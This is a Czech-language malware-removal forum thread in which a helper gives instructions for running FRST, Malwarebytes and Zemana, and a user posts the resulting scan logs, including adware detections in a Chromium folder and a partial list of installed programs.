64bit.:
http://www.bleepingcomputer.com/downloa ... ool/dl/82/
a ulož jej na plochu. ,pak spusť FrSt.
Potvrď způsob užití.
Neměň žádné z výchozích nastavení a klikni na položku „Scan“ („Skenovat“) .Když je skenování dokončeno, ukážou se dva logy = FRST.txt a Addition.txt a uloží se na ploše.Prosím zkopíruj sem celý jejich obsah.
Avira , Avast , nebo Comodo.
. spusť znovu Malwarebytes' Anti-Malware a dej Skenovat nyní
- po proběhnutí programu se ti objeví hláška tak klikni na „Vše do karantény(smazat vybrané)“ a na „Exportovat záznam“ a vyber „textový soubor“ , soubor nějak pojmenuj a někam ho ulož. Zkopíruj se celý obsah toho logu.
Stáhni si Zemana AntiMalware Free z tohoto odkazu:
https://www.zemana.com/Download/AntiMal ... .Setup.exe
a ulož si ho na plochu.
Poklepej na tento soubor na ploše a postupuj podle pokynů k instalaci programu.
Přijmi licenci k používání programu EULA , pokud se nabídne.
Pokud je k dispozici aktualizace programu , klepni na tlačítko „Update now“ ( aktualizovat nyní).
Můžeš si zatrhnout i vytvoření bodu obnovy:
Klikni na ozubené kolečko , poté na „Skenování“ a zatrhni „vytvářet body obnovy“.
Vrať se zpět ( klikni na domeček).
Zavři všechny otevřené soubory, složky a prohlížeče
Neměň žádné nastavení. Klikni na „Skenovat“.
Po skenu lze vidět , zda jsou nějaké nákazy. Klikni na „Další“. Nákazy budou přemístěny do karantény.
Když je skenování dokončeno, objeví se tisková zpráva , zkopíruj sem celý obsah té zprávy.
Jinak můžeš zprávy vidět , když klikneš vpravo nahoře na „ zprávy“.
Prosím stáhni příslušnou verzi programu pro Tvůj systém 32-bit/64-bit FarbarRecovery Scan Tool (FrSt)
32bit.:
http://www.bleepingcomputer.com/downloa ... ool/dl/81/
64bit.:
http://www.bleepingcomputer.com/downloa ... ool/dl/82/
a ulož jej na plochu. ,pak spusť FrSt.
Potvrď způsob užití.
Neměň žádné z výchozích nastavení a klikni na položku „Scan“ („Skenovat“) .Když je skenování dokončeno, ukážou se dva logy = FRST.txt a Addition.txt a uloží se na ploše.Prosím zkopíruj sem celý jejich obsah.
Při práci s programy HJT, ComboFix,MbAM, SDFix aj. zavřete všechny ostatní aplikace a prohlížeče!
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Re: Prosím o kontrolu logu
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:58
Logovací soubor: log mb.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1511
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433327
Uplynulý čas: 18 min, 10 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)
Soubor: 0
(Nebyly zjištěny žádné škodlivé položky)
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
Zemana AntiMalware 2.72.2.176 (instalační verze)
-------------------------------------------------------
Scan Result : Dokončeno
Scan Date : 2017.3.16
Operating System : Windows 10 64-bit
Processor : 4X Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
BIOS Mode : UEFI
CUID : 12CA5EF39989E83989550B
Scan Type : Skenování systému
Duration : 8m 20s
Scanned Objects : 90613
Detected Objects : 9
Excluded Objects : 0
Read Level : Normal
Auto Upload : Zapnuto
Detect All Extensions : Vypnuto
Scan Documents : Vypnuto
Domain Info : WORKGROUP,0,2
Detected Objects
-------------------------------------------------------
Internet Explorer Shortcut
Status : Skenováno
Object : "
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Podezřelé nastavení prohlížeče
Cleaning Action : Opravit
Related Objects :
Nastavení prohlížeče - Internet Explorer Shortcut
chrome.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_child.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_child.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_elf.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_elf.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_watcher.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_watcher.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
delegate_execute.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\delegate_execute.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
setup.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\installer\setup.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
metro_driver.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\metro_driver.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
nacl64.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\nacl64.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
Cleaning Result
-------------------------------------------------------
Cleaned : 9
Reported as safe : 0
Failed : 0
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:58
Logovací soubor: log mb.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1511
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433327
Uplynulý čas: 18 min, 10 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)
Soubor: 0
(Nebyly zjištěny žádné škodlivé položky)
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
Zemana AntiMalware 2.72.2.176 (instalační verze)
-------------------------------------------------------
Scan Result : Dokončeno
Scan Date : 2017.3.16
Operating System : Windows 10 64-bit
Processor : 4X Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
BIOS Mode : UEFI
CUID : 12CA5EF39989E83989550B
Scan Type : Skenování systému
Duration : 8m 20s
Scanned Objects : 90613
Detected Objects : 9
Excluded Objects : 0
Read Level : Normal
Auto Upload : Zapnuto
Detect All Extensions : Vypnuto
Scan Documents : Vypnuto
Domain Info : WORKGROUP,0,2
Detected Objects
-------------------------------------------------------
Internet Explorer Shortcut
Status : Skenováno
Object : "
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Podezřelé nastavení prohlížeče
Cleaning Action : Opravit
Related Objects :
Nastavení prohlížeče - Internet Explorer Shortcut
chrome.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_child.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_child.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_elf.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_elf.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_watcher.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_watcher.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
delegate_execute.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\delegate_execute.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
setup.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\installer\setup.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
metro_driver.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\metro_driver.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
nacl64.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\nacl64.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
Cleaning Result
-------------------------------------------------------
Cleaned : 9
Reported as safe : 0
Failed : 0
Re: Prosím o kontrolu logu
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by Nekut (16-03-2017 16:48:03)
Running from C:\Users\Nekut\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-27 17:22:44)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2417313614-488722605-2671369154-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2417313614-488722605-2671369154-503 - Limited - Disabled)
Guest (S-1-5-21-2417313614-488722605-2671369154-501 - Limited - Disabled)
Nekut (S-1-5-21-2417313614-488722605-2671369154-1001 - Administrator - Enabled) => C:\Users\Nekut
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
3DMark 11 (HKLM-x32\...\{f9e83b9c-ab7e-4005-8f32-4ea69703a5e4}) (Version: 1.0.132.0 - Futuremark)
3DMark 11 (Version: 1.0.132.0 - Futuremark) Hidden
4Story CZ 5.2.233 (HKLM-x32\...\4Story_CZ_is1) (Version: 5.2.233 - Gameforge4D GmbH)
A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACAD Private (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Age of Chivalry (HKLM-x32\...\Steam App 17510) (Version: - Team Chivalry)
AIDA64 Extreme v5.00 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.00 - FinalWire Ltd.)
Amnesia. A Machine for Pigs, âĺđńč˙ 1.0 (HKLM-x32\...\Amnesia. A Machine for Pigs_is1) (Version: 1.0 - DangeSecond)
Ansel (Version: 376.19 - NVIDIA Corporation) Hidden
ASTRO Command Center (HKLM-x32\...\{78FAE775-D963-4031-97CC-75D96FF648EB}) (Version: 1.0.121 - Astro Gaming)
AutoCAD 2017 - English (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Autodesk ReCap 360 (Version: 3.0.0.52 - Autodesk) Hidden
AVG Zen (Version: 1.22.1 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
BitTorrent (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\BitTorrent) (Version: 7.9.9.43296 - BitTorrent Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.24 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5790 - CDBurnerXP)
Cities Skylines Natural Disasters (HKLM-x32\...\Cities Skylines Natural Disasters_is1) (Version: - )
CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG)
COMODO Internet Security Premium (HKLM\...\COMODO Internet Security) (Version: 10.0.0.6092 - COMODO Security Solutions Inc.)
COMODO Internet Security Premium (Version: 10.0.0.6092 - COMODO Security Solutions Inc.) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.11 - Electronic Arts)
Euro Truck Simulator 2 (HKLM-x32\...\Euro Truck Simulator 2_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Farming Simulator 15 (HKLM-x32\...\Farming Simulator 15_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Fraps (HKLM-x32\...\Fraps) (Version: - )
Futuremark SystemInfo (HKLM-x32\...\{032DC00A-51D1-4D28-BFB7-1D0E85291E11}) (Version: 4.25.366 - Futuremark)
Gameforge Live 2.0.12 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.12 - Gameforge)
Goat Simulator Waste of Space (HKLM\...\Z29hdHNpbXVsYXRvcg_is1) (Version: 1 - )
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Grand Theft Auto San Andreas version 1.1.0.0 (HKLM-x32\...\Grand Theft Auto San Andreas_is1) (Version: 1.1.0.0 - Mr DJ)
Cheat Engine 6.5 (HKLM-x32\...\Cheat Engine 6.5_is1) (Version: - Cheat Engine)
Import souborů SketchUp 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
IsoBuster 3.7 (HKLM-x32\...\IsoBuster_is1) (Version: 3.7 - Smart Projects)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
LOOT version 0.9.2 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.9.2 - LOOT Team)
Malwarebytes verze 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{51adbf11-493f-431c-a862-967a0fae2944}) (Version: 12.0.21005.1 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\Minecraft) (Version: 1.8.8 - Minecraft)
Minimal ADB and Fastboot version 1.4.2 (HKLM-x32\...\{1901BAF7-7E78-4041-BC88-D0EE5DD1DFD9}_is1) (Version: 1.4.2 - Sam Rodberg)
Mount and Blade Warband - Viking Conquest (HKLM-x32\...\Mount and Blade Warband - Viking Conquest_is1) (Version: - )
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.62.1 - Black Tree Gaming)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.4.0.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.4.0.70 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.16.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
O&O Defrag Professional (HKLM\...\{50C961A1-889F-4A4E-9587-2772A45B6AAD}) (Version: 18.0.39 - O&O Software GmbH)
OpenOffice 4.1.1 (HKLM-x32\...\{C560D6E7-E40A-435D-8B71-62CBCF1701B2}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.103.32.0 - Overwolf Ltd.)
Ovládací panel NVIDIA 376.53 (Version: 376.53 - NVIDIA Corporation) Hidden
Path of Exile (HKLM-x32\...\{52797cef-39ff-4ea9-b055-4f9a336b412d}) (Version: 2.2.1.53465 - Grinding Gear Games)
Path of Exile (x32 Version: 2.2.1.53465 - Grinding Gear Games) Hidden
Počítačová aplikace Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Process Lasso (HKLM-x32\...\ProcessLasso) (Version: 8.9.8.6 - Bitsum)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Shadow.Warrior.2.Deluxe.Edition.[v.1.1.3.0]-ALI213 verze 1.1.3.0 (HKLM-x32\...\{ACB6FC5F-552D-4C67-A0F5-25555114841B}}_is1) (Version: 1.1.3.0 - Ali213.net)
Shelter 2 Mountains (HKLM-x32\...\Shelter 2 Mountains_is1) (Version: - )
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Simple Port Forwarding (HKLM-x32\...\Simple Port Forwarding) (Version: 3.8.5 - PcWinTech.com)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
Skyrim Script Extender (SKSE) (HKLM\...\Steam App 365720) (Version: - The SKSE Team)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Speciální aplikace Autodesk 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sync withSIX (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Sync) (Version: 1.2.7 - SIX Networks GmbH)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Elder Scrolls V: Skyrim (HKLM\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.7 - Tunngle.net GmbH)
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
Vietcong (HKLM-x32\...\Vietcong) (Version: - )
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
